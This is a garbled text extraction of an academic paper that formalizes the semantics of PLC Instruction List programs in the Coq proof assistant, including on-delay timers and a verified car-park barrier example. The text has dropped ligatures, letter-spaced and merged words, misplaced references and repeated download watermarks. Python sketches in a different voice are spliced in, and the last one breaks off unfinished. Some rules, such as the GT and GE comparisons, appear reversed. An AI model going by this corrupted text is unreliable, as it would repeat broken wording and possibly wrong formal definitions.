[8] X. Leroy, "A formally verified compiler back-end," Journal of Automated Reasoning, vol. 43, no. 4, pp. 363-446, 2009.
[9] G. Gonthier and A. Mahboubi, "An introduction to small scale reflection in Coq," INRIA Technical report, http://hal.inria.fr/inria-00515548/PDF/RR-7392.pdf.
[10] W. Bolton, Programmable Logic Controllers. Elsevier, 2006.
[11] H. Wan, G. Chen, X. Song, and M. Gu, "Formalization and verification of PLC timers in Coq," in Computer Software and Applications Conference (COMPSAC 2009), 33rd Annual IEEE International, 2009, pp. 315-323.
[12] J. O. Blech, A. Hattendorf, and J. Huang, "Towards a property preserving transformation from IEC 61131-3 to BIP," CoRR, vol. abs/1009.0817, 2010.
[13] S. Bensalem, M. Bozga, T.-H. Nguyen, and J. Sifakis, "Compositional verification for component-based systems and application," IET Software, Special Issue on Automated Compositional Verification: Techniques, Applications and Empirical Studies, vol. 4, no. 3, pp. 181-193, 2010.
A formal semantics of PLC programs in Coq Sidi OULD BIHA FORMES project, INRIA and Tsinghua University Beijing, China Sidi.Ould [email protected] I. Introduction Programmable Logical Controllers (PLC) are micro-processor based control systems. They are used in a wide range of industrial applications, from automotive industry and chemical plants to home appliances. PLC applications are critical in a safety or economical cost sense. The recent events of the recall of a large amount of cars for some safety problems caused by a programming bug, are just a new example of a how the cost of such errors can easily get out of proportion. This is more relevant for PLC programs because they are generally used to perform repetitive actions. Thus the use of formal methods and specially theorem proving in the PLC programs development process, will increase the con dence in such programs. Instruction list (IL) is one of the ve programing languages de ned in the IEC 61131-3 standard [1]. With the graphical language ladder diagrams (LD), they are the most widely used languages for pro- graming PLC. The de nition of a formal semantics of IL is a prerequisite for the development of a generic tool for verifying PLC programs written in IL. Since most of PLC compilers use IL as an This research work is funded by the ANR grant ANR-08- BLAN-0326-01 for the SIVES project.intermediate language in the compilation process to machine code, a formal semantics of IL is also nec- essary for the development of a certi ed compiler f o rP L C .T h i sw o r ki st h e r s ts t e pt o w a r d st h e development of a certi ed compiler for PLC pro- grams. It also provides a basis for the development of a static analyzer for PLC programs. There are many examples of the use of formal methods for the veri cation of PLC programs [2], [3], [4]. Most of these examples use model checking. In some of these works, an operational seman- tics of PLC programs is de ned. We extend the operational semantics de ned in [5] to support a larger subset of IL instructions (timers...) and the cyclic behavior of PLC programs. We formalized t h i ss e m a n t i c si nt h ep r o o fa s s i s t a n t Coq [6] using its extension SSRe ect [7]. In this paper, we give in the rst section a brief presentation of PLC systems. In the second section we present a small step operational semantics of the IL language. The formalization of this semantics in the proof assistant Coq and an example are d e s c r i b e di nt h et h i r ds e c t i o n .R e l a t e dw o r k sa n d conclusions are presented in the two nal sections. II. Programmable Logic Controller A PLC is composed of a microprocessor, a mem- ory, input and output devices where signals can be received from sensors or switches and sent to actuators. A main characteristic of PLC is there execution mode. A PLC program is executed in a permanent loop. In each iteration of the execution loop, or scan cycle , the inputs are read, the pro- gram instructions are executed and the outputs are updated. Figure 1 shows the sequencing of the 3 phases of the scan cycle . The cycle time is often xed or has an upper bound limit. It depends on the manufacturer and type of the PLC. 
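A scan cycle of this kind can be pictured as the following loop. This is an informal Python sketch, not part of the paper's formal development; read_inputs, execute_program and write_outputs are placeholder functions, and the cycle time is enforced here by sleeping, whereas a real PLC instead bounds the scan time from above.

import time

def scan_loop(read_inputs, execute_program, write_outputs, cycle_time_s=0.01):
    while True:
        start = time.monotonic()
        inputs = read_inputs()                 # input scan
        outputs = execute_program(inputs)      # instruction execution
        write_outputs(outputs)                 # output scan
        # wait out whatever remains of the fixed cycle time
        time.sleep(max(0.0, cycle_time_s - (time.monotonic() - start)))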
2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23126 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23127 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23118 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Inputs scan instructions execution Outputs scan Figure 1. Schema of PLC scan cycle A. Programing languages Since the introduction of PLC in the industry, each manufacturer has developed its own PLC programming languages. In 1993, the International Electrotechnical Committee (IEC) published the IEC 1131 International Standard for PLC. The third volume of this standard de nes the program- ming languages for PLC. It de nes 4 languages : Ladder Diagrams (LD) : graphical language that represent PLC programs as relay logic diagrams. Functional Block Diagrams (FBD) : graphical language that represent PLC programs as con- nection of di erent function blocks. Instruction List (IL) : an assembly like lan- guage. Structured Text (ST) : a textual (PASCAL like) programing language. The standard de nes also a meta language called Sequential Function Charts (SFC). It corresponds to a graphical method for structuring programs and allows to describe the system as a state transition diagram. Each state is associated to some actions. An action is described using one of the PLC pro- graming languages like LD or IL. SFC are well suited to write concurrent control programs. We present later in more details the IL language, the main focus of this work. B. Timers In the context of PLC applications, there is often the need to control time. For example, a motor might need to be activated or switched o for a particular time interval. Another example, in a chemicalplantavalveisopenandatankwillbefullafter a period of time. PLC timers are components that set on a boolean output after or for a period of time following the activation of a boolean input. They are used to control output signal duration or as input signal for time dependents PLC programs. In general, they have two inputs and two outputs. Txx TIME PTBOOL IN ETTIMEQBOOL Figure 2. Standard timer representation Figure 2 shows the IEC 61131-3 standard graphical representation of timers. In this representation, IN andQarerespectivelythebooleaninputandoutput of the timer. PTis the constant input used to specify the time delay of the timer. ETis the output indicating the elapsed time since the activation of the timer. The delay PTand elapsed time ETare multiples of a system prede ned time base. IN Q (a)on-delay timerIN Q (b)o -delay timer IN Q (c)pulse timer Figure 3. Types of timers T h e r ei st h r e eb a s i ct y p e so ft i m e r st h a tc a nb e found with PLC. The IEC 61131-3 standard de nes the : on-delay timers (TON) : they come on after a time delay following the activation of the input (Figure 3(a)). o -delay timers (TOF) : they stay on for a xed period of time after the input goes o (Figure 3(b)). pulse timers (TP) : they turn on for a xed period of time after the input goes on (Fig- ure 3(c)). 127 128 119 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. III.Instruction List language A. 
General structure The IEC 61131-3 standard de nes an Instruction Listprogram as a list of variables (input, output and local) declarations followed by a list of instruc- tions. An instruction contains an operator followed by a list of operands . Most of IL instructions take one operand, but some like timers instructions need more than one operand. A labelfollowed by a c o l o n( : )c a nb ei n s e r t e db e f o r ea ni n s t r u c t i o n .A n example of IL program is the following: LABEL OPERATOR OPERAND l1: LD x ADD 3 JMP l1 The meaning of some IL operators can be changed using modi ers. In particular, the standard de nes the two modi ers: Cand N.T h e Cmodi er indi- cates that the corresponding instruction should be executed only if the current evaluated result is the boolean value true. It can be used with branch- ing instruction or functions call. The Nmodi er indicates that the operand of the corresponding instructionshouldbenegated.Ifitiscom binedwith theCmodi er, it means that the corresponding i n s t r u c t i o ns h o u l db ee x e c u t e do n l yi ft h ec u r r e n t evaluated result is the boolean value false.I tc a n be used with branching instruction, functions call or booleans operators. For example, the instruction JMPCN l1 will be executed only if the current eval- uation is false. B. Model choices The IEC 61131-3 standard was published after many PLC manufacturers have de ned and imple- mented their own programming languages. It does not give a clear description of the semantics of PLC languages. It does not also specify how PLC timers shouldbehave.WesawpreviouslythataPLCtimer have two outputs : the boolean output and the elapsed time since the timer activation output. How this output are updated is not described by the standard. In practice, PLC manufacturers de nes t w ot y p e so ft i m e r sa c c o r d i n gt ot h ew a yt h e i r outputs are updated. In the rst category, outputs can be updated only if the timer instruction isexecuted. For this kind of timers, a time error is introduced depending on the timer delay variable and the program cycle duration. In the second category, timer outputs are automatically updated by a system routine. In this case a time error is introduced depending on the position of the timer instruction in the program. The execution of the timer instruction is only required to check the state of the outputs. Both timers are not ideal timers and the time error should be taken into account by the PLC programmer when de ning the timers delay input. Our IL model is a signi cant subset of the lan- guage de ned by the IEC 61131-3 standard. This subset covers assignments instructions and boolean and integer operations. It covers also comparison andbranchinginstructionsand on-delaytimers .W e choose to consider only booleans and integers as basic data types. In most of PLC systems, reals are available as basic data types. But in practice, real numbers computation cost much time and they are often delegated to a PC that can communicate with the PLC. This is motivated by the need to keep the program scan cycle within a relatively small time upper bound. In this work we will consider only TON timers. The other two kinds of timers can be treated similarly. We will also suppose that the outputs of the timers are updated only when the timer instruction is executed. This is the case in most of the timers provided by PLC manufacturers. We will also suppose that in an IL program, a timer instruction is called only once with the same output variable. 
This is needed to keep the time error for the timer less than an cycle duration. T h eI Ls u b s e tw ew o r kw i t hd o e sn o ti n c l u d e function call or counters instructions. In our model, we also choose to work with simple IL operators. In particular, the IL language support binary opera- tors that use a stack for the operation execution. T h eI Ls u b s e tw ed e a lw i t hd o e sn o ti n c l u d e st h i s operators.Anextensionofoursemanticstosupport these operators and the function call should not be di cult. C. Syntax EachILprogramstartwithvariabledeclarations. We will denote the type of IL variables by Var. These declarations specify for each variable if it is 128 129 120 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. an input ( Varin) or/and output ( Varout)o ral o c a l variable ( Varloc). In addition to standard variables, IL have a speci c register where every computation takes place. This special register will be denoted reg. P::={varin;list input variables varout;list output variables varloc;list local variables body;}list of instructions After the variable declarations, the IL program body follows with a list of instructions. As we mentioned before, an IL instruction is composed of an operator and one or more operands. An operand can be a variable or a constant. Instructions: i::= LDop load |STid store |SRid|RSid set and reset |JMPlbl|JMPClbljumps |JMPCN lbl |ADDop|SUBop integers |MULop |ANDop|ORop booleans |ANDN op|ORNop |NOTop |EQop|GEop comparison |GTop |TONid , n On delay timer |RET end of program Operands: op::=id|cstvariable identi er or constant Constants: cst::=n|binteger or boolean literal We will denote the set of IL instructions by Instr. For simplicity, we suppose that IL program labels are natural numbers. Since an IL program is a list of instruction, a label will indicate the position of thecorrespondinginstructioninthelist.Foragiven program Pand an index i,P(i) Instrrepresent the instruction of Pat the position i. D. Operational semantics We de ned a small step operational semantics of IL programs. This semantics extend the one de ned in [5] to support on-delay timers and the cyclic behavior of PLC programs.Modes:as we mentioned in Section II, each IL program scan cycle contains 3 phases: I: input, O: output, E: instruction execution. The set of these execution phases will be denoted modes. Cycles: we suppose having a global discrete time clock. Each program execution cycle is rep- resented by an identi er or its index in the time execution line. Every cycle is associated to its beginning time according to the global clock. The set of program execution cycles is denoted C N. For a cycle c, the starting time is denoted tcand t h ed u r a t i o no fe v e r yc y c l ei s x e da n dc o r r e s p o n d to a global system constant =tc+1 tc. States:a state is a function that associates to each variable of the program and the register a value. The set of state corresponds to: S={reg} Var D, whereDis the union of the IL variables data domains. Con gurations: elements of the set E=C S N mode. A con guration (c, ,i,m)corresponds to a cycle identi er c, a state , a position index i and an execution mode m. Transitions: relationoncon gurations E E. F i g u r e4g i v e st h ei n f e r e n c er u l e so ft h eI Lc o n g u - rations transitions relation. 
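For readability, a few representative rules of Figure 4 are restated here in conventional inference-rule notation; sigma denotes the state, sigma(reg) the current register, Delta the cycle duration, and T and F the boolean constants. This is only a restatement of rules already given in Figure 4, not an extension of them.

\[
\frac{P(i)=\mathtt{LD}\ op \quad \sigma'=\sigma[\mathit{reg}\mapsto\sigma(op)]}
     {P\vdash(c,\sigma,i,E)\rightarrow(c,\sigma',i{+}1,E)}
\qquad
\frac{P(i)=\mathtt{ST}\ x \quad \sigma'=\sigma[x\mapsto\sigma(\mathit{reg})]}
     {P\vdash(c,\sigma,i,E)\rightarrow(c,\sigma',i{+}1,E)}
\]
\[
\frac{P(i)=\mathtt{JMPC}\ \mathit{lbl} \quad \sigma(\mathit{reg})=T}
     {P\vdash(c,\sigma,i,E)\rightarrow(c,\sigma,\mathit{lbl},E)}
\qquad
\frac{P(i)=\mathtt{TON}\ T_x,Pt \quad \sigma(\mathit{reg})=T \quad \sigma(T_x.ET)<Pt \quad
      \sigma'=\sigma[T_x.Q\mapsto F,\ T_x.ET\mapsto\sigma(T_x.ET)+\Delta]}
     {P\vdash(c,\sigma,i,E)\rightarrow(c,\sigma',i{+}1,E)}
\]
\[
\frac{P(i)=\mathtt{RET}}
     {P\vdash(c,\sigma,i,E)\rightarrow(c,\sigma,0,O)}
\qquad
\frac{\sigma'=\sigma[x_k\mapsto v_k],\ x_k\in \mathit{Var}_{in}}
     {P\vdash(c,\sigma,i,I)\rightarrow(c,\sigma',i,E)}
\qquad
\frac{}{P\vdash(c,\sigma,i,O)\rightarrow(c{+}1,\sigma,i,I)}
\]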
The transition system is de ned by an initial con guration (0, 0,0,I), where 0istheinitialstatethatmapsallthein teger variables to 0and boolean variables to false. The rst two transitions rules of Figure 4 cor- respond to the loadandstoreinstructions. In the rst case the register is updated while in the second the variable state is updated. The transitions cor- responding to the set/reset instructions (rules SR andRS) update the variable state function with the corresponding values for the given operands. In the inference rule JMP, transition for the uncondi- tional branching instruction, there is no condition on the branching label value (position of the jump- ing target) compared to the current position of the program counter. This can lead to non terminating ILprograms.Inpracticethisshouldnotbethecase, since every IL program should terminate during the 129 130 121 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. LDP(i)=LD op /prime= [reg/mapsto op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=STx /prime= [x/mapsto reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ST SRP(i)=SR x /prime= [x/mapsto x reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=RS x /prime= [x/mapsto x reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)RS JMPC-trueP(i)=JMPC lbl (reg)=T P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=JMPC lbl (reg)=F P/turnstileleft(c, ,i,E ) (c, ,i +1,E)JMPC-false JMPCN-falseP(i)=JMPCN lbl (reg)=F P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=JMPCN lbl (reg)=T P/turnstileleft(c, ,i,E ) (c, ,i +1,E)JMPCN-true JMPP(i)=JMP lbl P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=ADD op /prime= [reg/mapsto reg+op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ADD SUBP(i)=SUB op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=MUL op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)MUL ANDP(i)=AND op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=OR op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)OR ANDNP(i)=ANDN op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=ORN op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ORN NOTP(i)=NOT op /prime= [reg/mapsto op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=EQ op /prime= [reg/mapsto reg==op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)EQ GEP(i)=GE op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=GT op /prime= [reg/mapsto reg < op ] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)GT P(i)=TONTx,Pt (reg)=F /prime= [Tx.Q/mapsto F,Tx.ET /mapsto 0] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)TON-off P(i)=TONTx,Pt (reg)=TTx.ET < Pt /prime= [Tx.Q/mapsto F,Tx.ET /mapsto Tx.ET + ] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)TON-on P(i)=TONTx,Pt (reg)=TTx.ET > =Pt /prime= [Tx.Q/mapsto T,Tx.ET /mapsto Tx.ET + ] (c, ,i,E ) (c, /prime,i+1,E)TON-end P(i)=RET P/turnstileleft(c, ,i,E ) (c, , 0,O)RET x:Var in /prime= [xi/mapsto vi] P/turnstileleft(c, ,i,I ) (c, /prime,i,E )InputP/turnstileleft(c, ,i,O ) (c+1, ,i,I )Output Figure 4. IL Operational semantics scan cycle time limit. We chose here not to consider this kind of errors. They can be treated at the level of the syntactic analysis or by static analysis of the program. ThetransitionrelationfortheTONinstructionis given by the rules TON-off ,TON-on andTON- endof Figure 4. 
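The intended behaviour of these three TON rules can be mimicked with a small Python class, given purely as an illustration. The class name and attributes are ours; delta stands for the cycle duration and pt for the preset delay PT, and, as assumed above, the outputs are only updated when the timer instruction is executed.

class TON:
    def __init__(self, pt, delta):
        self.pt, self.delta = pt, delta
        self.q, self.et = False, 0    # outputs Q and ET

    def execute(self, cr):
        # called once per scan cycle, when the TON instruction is reached
        if not cr:                        # input off: reset (TON-off)
            self.q, self.et = False, 0
        else:
            self.q = self.et >= self.pt   # TON-on / TON-end
            self.et += self.delta
        return self.q

t = TON(pt=30, delta=10)
print([t.execute(True) for _ in range(5)])   # [False, False, False, True, True]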
The elapsed time variable ET of the TON timer is incremented by the global constant when the timer is activated (the eval- uation register value is true). The timer output Qis activated when the elapsed time variable ET is greater or equal to the timer delay parameter PT. For the inputtransition, the variables state function is updated by the input variables values given by the program global environment. The output transition corresponds to the cycle identi er incrementation and the change of the con gurationmode. The program environment will have to read t h ev a r i a b l e ss t a t ed u r i n gt h i st r a n s i t i o nt og e tt h e values of the outputs of the system. After this de nition of the semantics of the IL language, we present in the next section our for- malization of this semantics in the proof assistant Coq. IV. Coq formalizations As we mentioned before, we intend to develop a certi ed compiler from IL to the C language. We choose to formalize the IL semantics in the Coq proof assistant to make it easier to connect our de- velopment to the already existing certi ed compiler for C : the CompCert [8] compiler. We also want to produce from this formal development a certi ed executable. The Coq extraction mechanisms will allow us to produce such executable. 130 131 122 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. In the reasoning about IL programs, we will have to deal with proprieties about booleans and naturals numbers. In this development, we chose to use the Coq extension SSRe ect for its rich libraries on booleans and natural numbers. We also use SSRe ect generic library for lists and its interface for types with decidable equality. More details about this libraries can be found in the SSRe ect manual [7] and tutorial [9]. A. Syntax TheCoq system provides a very powerful mech- anism to de ne recursive or nite type or set. This mechanism is called inductive type and is very useful when de ning the syntax of a programming language. We de ne the IL syntax presented in Section III-C, using the Coq inductive type mech- anism. The de nitions are given in Figure 5. In these de nitions, the types timeand identare a renaming of the Coq standard type nat.T h e r s t one corresponds to the type of variable identi ers. Sinceweconsiderdiscretetime,thetype timeisthe type of time values. A piece of IL code corresponds toalistofinstruction.Werepresentitasanelement of the type code := seq Instr1. Inductive ILcst : Type := | Ncst (n : nat) | Bcst (b : bool) | Tcst (t : time). Inductive Operands : Type := | var (id : ident) | cst (c : ILcst). Inductive Instr : Type := | LD (op : Operands) | ST (x : ident) | SR (x : ident) | RS (x : ident) | JMP (l : nat) | JMPC (l : nat) | JMPCN (l : nat) | ADD (op : Operands) | SUB (op : Operands) | MUL (op : Operands) | AND (op : Operands) | OR (op : Operands) | ANDN (op : Operands) | ORN (op : Operands) | NOT (op : Operands) | EQ (op : Operands) | GT (op : Operands) | GE (op : Operands) | TON (q et : ident) (pt : time) | RET. Figure 5. Coq de nition of the IL syntax B. Semantics Our formalization of the IL semantics de ned in Section III-D is parameterized by the following Coq global variables: 1seqi st h et y p eo fl i s ti n SSRe ect.Variables (delta:time)(pi:seq ident ). Variables (p_ival:nat ident nat)(P:code). The variable deltarepresents the cycle duration time. The list of program input variables is rep- resented by pi. 
In order to de ne the semantics transitions, we need to know the input variables in order to update them with the values given by the program environment at the beginning of each cycle. Those values are represented by the function p_ivalthat takes as parameters a cycle identi er and a variable identi er and returns a value. When we look at the de nition of the transition relation for the IL semantics given in Figure 4, we notice that it can be decomposed into two sub-operations. First, there is the states updating function. It returns a new state according to the evaluated program instruction. Second, there is the program location successor. Normally it returns the incremented value of the current location, unless the instruction is a branching. The con guration transitionfunctioncanbede nedontopofthesub- operations just by checking the execution mode. States:For the de nition of the variable states a n ds i n c eb o o l e a n sc a nb ei n j e c t e di ni n t e g e r s2,w e chooseto representthenaturalnumbersasthedata domain of the IL variables. We de ne a state as an object of the type State. Definition State:=nat (ident nat). Definition state_u psiv:State:= ifiis(Sn)then (s.1,funx=>ifn==xthen velse s.2x) else(v,s.2). A program state s : State is a pair. The rst element of the pair, denoted s.1,r e p r e s e n t st h e value of the current register. The second element of the pair, denoted s.2, represents the function that maps every program variable to its value. We de ne also some state transformation function. The function state_up updatesthevalueofastate sfor a given variable determined by its second argument iwith a value v.I fiis equal to zero the current register value is updated otherwise the variables mapping function is updated. Instruction evaluation: The de nition of the IL instruction evaluation function is presented in Fig- 2This can be automatically done in Coq using coercions. 131 132 123 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Definition eval_instr (s : State) (i : Instr) : State := match iwith | LD op => state_up s 0 (s op) | ST x => state_up s x.+1 s.1 | SR x => state_up s x.+1 (BofN s.1 || BofN (s.2 x)) | RS x => state_up s x.+1 (~~ BofN s.1 && BofN (s.2 x)) | AND op => state_up s 0 (BofN s.1 && BofN (s op)) | OR op => state_up s 0 (BofN s.1 || BofN (s op)) | NOT op => state_up s 0 (~~ BofN (s op)) | ANDN op => state_up s 0 (BofN s.1 && ~~ BofN (s op)) | ORN op => state_up s 0 (BofN s.1 || ~~ BofN (s op)) | ADD op => state_up s 0 (s.1 + s op) | MUL op => state_up s 0 (s.1 * s op) | SUB op => state_up s 0 (s.1 - s op) | GT op => state_up s 0 (s.1 < s op) | GE op => state_up s 0 (s.1 <= s op) | EQ op => state_up s 0 (s.1 == s op) |T O Nqe tp t= > ifBofN s.1 then let s := state_up s et.+1 (s.2 et + d) in ifs.2 et < pt then state_up s q.+1 0 else state_up s q.+1 1 else let:s : =s t a t e _ u pse t . + 10 instate_up s q.+1 0 |_= >s end. Figure 6. IL instructions evaluation function ure 6. It follows the inference rules given in Fig- ure 4. The function eval_instr takes two argu- ments, a state and an instruction, and returns a new state. For example, the evaluation of a load instruction will return an updated state where the current register is equal to the value of the instruc- tion operands. Another example is given by the set instruction SR x. 
For this case, the variable xis updated with the disjunction of its previous value and the value of the current register. For the opera- tors that are de ned only for booleans values (like: SR,AND...), we use the function BofNthat return the original boolean value of a boolean variable that was translated to a natural numbers. In the de nition of Figure 6 and the following de nitions, we use an SSRe ect notation for a natural number successor. When we write x.+1this correspond to the successor of xorx+1. Con gurations transition: the IL con gurations, presented in Section III-D, are encoded as a Coq product type. Inductive ILmode:=I|O|E. Definition ILConf:=nat State nat ILmode. In a con guration, cycle identi er and location are represented by naturals numbers. The execution mode is represented by an element of the inductiveDefinition instr_succ (i : Instr) x (s : State) : nat := match iwith |J M Pl= >l | JMPC l => ifBofN s.1 then lelse x.+1 | JMPCN l => if~~ BofN s.1 then lelse x.+1 | _ => x.+1 end. Definition transition (Cf : ILConf) := match Cfwith ( c ,s ,l ,m )= > match mwith |I= > let s := state_up_seq s pi (p_ival c) in (c, s , l, E) | O => (c.+1, s, l, I) |E= > let I := nth RET P l in ifI == RET then ( c ,s ,0 ,O ) else (c, eval_instr s I, instr_succ I l s, E) end end. Figure 7. IL Con gurations transition function type ILmode. The elements of this nite type cor- responds to the three modes we de ned previously in Section III-D. Since our IL semantics is deterministic, we de ne the con gurations transition relation as a function. TheCoq de nition is given in Figure 7. The transi- tionfunctionproceedsbylookingatthemodeofthe con guration passed as argument. If it is an input mode,thevariablesstatefunctionisupdatedbythe new values of the input variables and the mode is changed to execution . The function state_up_seq is a generalization of the state updating function state_up that updates a list of variables. When the originalcon gurationhasan outputmode,thecycle identi er is incremented and the mode is changed toinput. This two cases correspond to the inference rules InputandOutput of Figure 4. When the con guration mode is execution ,t h e transition function will rst check the instruction corresponding to the current con guration. This instruction corresponds to the lthelement of the list of instructions of the code P.W eu s eh e r et h e generic function nthfrom SSRe ect seqlibrary. If the element at the position lofPis equal to RET thentherule RETofFigure4isapplied.Otherwise thecycleand the modewill not be modi ed. The variable state will be updated using the function eval_instr . The con guration location is updated usingthefunction instr_succ thatreturnsthesuc- cessor of a location according to the corresponding instruction and the state of the current register. 132 133 124 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Program executions: After the de nition of the IL con guration transition function, we de ne a program execution as the transitive closure of the transition relation. Since it is not always possible to know how many transition are needed to execute an IL program, we de ne the program execution as a propositional relation rather than a compu- tational function. The de nition of execis given Inductive exec (c1 c2 : ILConf) : Prop := | exec_step : transition c1 = c2 exec c1 c2 | exec_star cf : transition c1 = cf exec cf c2 exec c1 c2. 
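Read operationally, the transition function behaves like the following Python analogue. This is illustrative only: eval_instr and instr_succ are assumed to be provided (for instance along the lines of the instruction-evaluation sketch given earlier), the state is simplified to a flat dictionary, and the configuration mirrors ILConf as (cycle, state, location, mode) with mode one of "I", "E", "O".

def transition(conf, program, input_values, eval_instr, instr_succ):
    cycle, state, loc, mode = conf
    if mode == "I":                              # input phase: latch the inputs
        state = dict(state, **input_values(cycle))
        return (cycle, state, loc, "E")
    if mode == "O":                              # output phase: next cycle
        return (cycle + 1, state, loc, "I")
    # execution phase: out-of-range locations behave like RET, as with nth
    instr = program[loc] if loc < len(program) else ("RET", None)
    if instr[0] == "RET":                        # end of the program body
        return (cycle, state, 0, "O")
    return (cycle, eval_instr(state, instr), instr_succ(instr, loc, state), "E")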
Lemma exec_splitI_prodl : forall cns 0s , exec (c, s0, 0, I) (c + n.+1, s, 0, O) exists r, exec (c, s0, 0, I) (c, r, 0, O) exec (c.+1, r, 0, I) (c + n.+1, s, 0, O). Lemma exec_splitI_prodr : forall cns 0s , exec (c, s0, 0, I) (c + n.+1, s, 0, O) exists r, exec (c, s0, 0, I) (c + n.+1, r, 0, I) e x e c( c+n . + 1 ,r ,0 ,I )( c+n . + 1 ,s ,0 ,O ) . Figure 8. IL program execution de nition and lemmas in the Figure 8. It corresponds to the standard transitive closure predicate. In addition to this de - nition, we prove some generic properties about any program executions. The rst lemma of Figure 8 states that if the execution of a program starting from the con gurations (c, s0, 0, I) ends at the con guration (c + n.+1, s, 0, O) ,i tm u s tc o m e through a con guration where the cycle is the rst execution cycle and the mode is output. The second lemma states the same property but for the last execution cycle. The proofs of this two lemmas are straightforward. They use induction and the property of monotonicity of the execrelation for cycles. Using our IL semantics, we formalized a simple example of PLC program and proved some prop- erties about it. This is presented in the following sub-section. C. Example We formalized a simple example of PLC pro- gram written in the IL language. It is one of the examples given in the book Programmable Logic Controller s [10]. Description: We consider the example of a PLC program for opening and closing a car park en-trance barrier. The barrier is opened when the cor- rect amount of money is inserted in the collection box. The barrier will stay open for 10 seconds. The program has three inputs and two outputs. The rst input is associated to a sensor in the collection box. When the barrier is down it trips a switch and when up it trips another switch. These switches are associated to the two others input variables of the program. They give the position of the barrier to the program. The opening and closing of the barrier is managed by a valve-piston system. The two program outputs are associated to the two valves of this system. The program source Inputs: X400 (I0) X401 (I1) X402 (I2) Outputs: X430 (Q0) X431 (Q1)LD X400 OR Y430 ANI M100 ANI Y431 OUT Y430 LD X401 OUT T450 K1 0 LD T450 OUT M100 LD M100 OR Y431 ANI X402 ANI Y430 OUT Y431 ENDDefinition P1 := [:: LD I0; OR Q0; ANDN T0; ANDN Q1; ST Q0; LD I1; TON T0 ET0 PT; LD T0; OR Q1; ANDN I2; ANDN Q0; ST Q1; RET ]. Figure 9. Car barrier program in Mitsubishi format and in Coq in theMitsubishi format, which does not follow the standard, and the corresponding Coq de nition are presented in Figure 9. The output Q0for raising the entrance barrier is activated when the input I0 is activated. It remains on until the timer output variable T0is activated. This happens when the input I1, indicating that the barrier is up, remains on for 10 seconds. At the end of the time delay the output Q1is activated telling the valve-piston system to lower the barrier. In a normal state, the input variables I1and I2should have opposite boolean values. When they have the same values, it means the barrier is in the process of being lowered or raised. Properties: weformalizedandprovedsomesafety properties about the IL program presented above. For example, Figure 10 shows two lemmas that prove some properties about the output Q0and the timer output T0.T h el e m m a barrier_open 133 134 125 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. 
Lemma barrier_open : forall c s0 s, exec (c, s0, 0, E) (c, s, 0, O) -> BofN (s Q0) = (BofN (s0 I0) || BofN (s0 Q0)) && ~~ BofN (s0 T0) && ~~ BofN (s0 Q1).
Lemma timer_on : forall c s0 s, exec (c, s0, 0, E) (c, s, 0, O) -> BofN (s T0) = BofN (s0 I1) && (PT <= (s0 ET0)).
Figure 10. IL Configurations transition
states that after one cycle of execution, the output Q0 will be on if the input I0 was on at the input phase or Q0 was on in the previous cycle, and the timer output and the output Q1 were off during the previous cycle. The lemma timer_on states that the timer output will be on if and only if the input I1 is on and the elapsed time is greater than or equal to the predefined time delay. The proofs of these two lemmas are straightforward and proceed by case analysis over the inductive predicate exec. V. Related works There are numerous publications on the use of formal methods for the verification of PLC programs. Model checking is the most widely used approach in these verification works. In [2] a semantics of IL is defined using timed automata. The language subset contains TON timers but data types are limited to booleans. The formal analysis is performed by the model checker UPPAAL. In [3] an operational semantics of IL is defined. A significant subset of IL is supported by this semantics, but it does not include timer instructions. The semantics is encoded in the input language of the model checker Cadence SMV and linear temporal logic (LTL) is used to specify properties of PLC programs.
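As an informal complement to the IL semantics formalized above, the following Python sketch mimics the configuration transition function of Figure 7 and runs one scan cycle of a latch in the spirit of the barrier example. It is only an illustration added here: the instruction coverage (a few boolean operators, no timers), the data representation and all identifiers are simplifications chosen for this sketch, not part of the Coq development.

# Minimal, unverified Python analogue of the IL configuration transition
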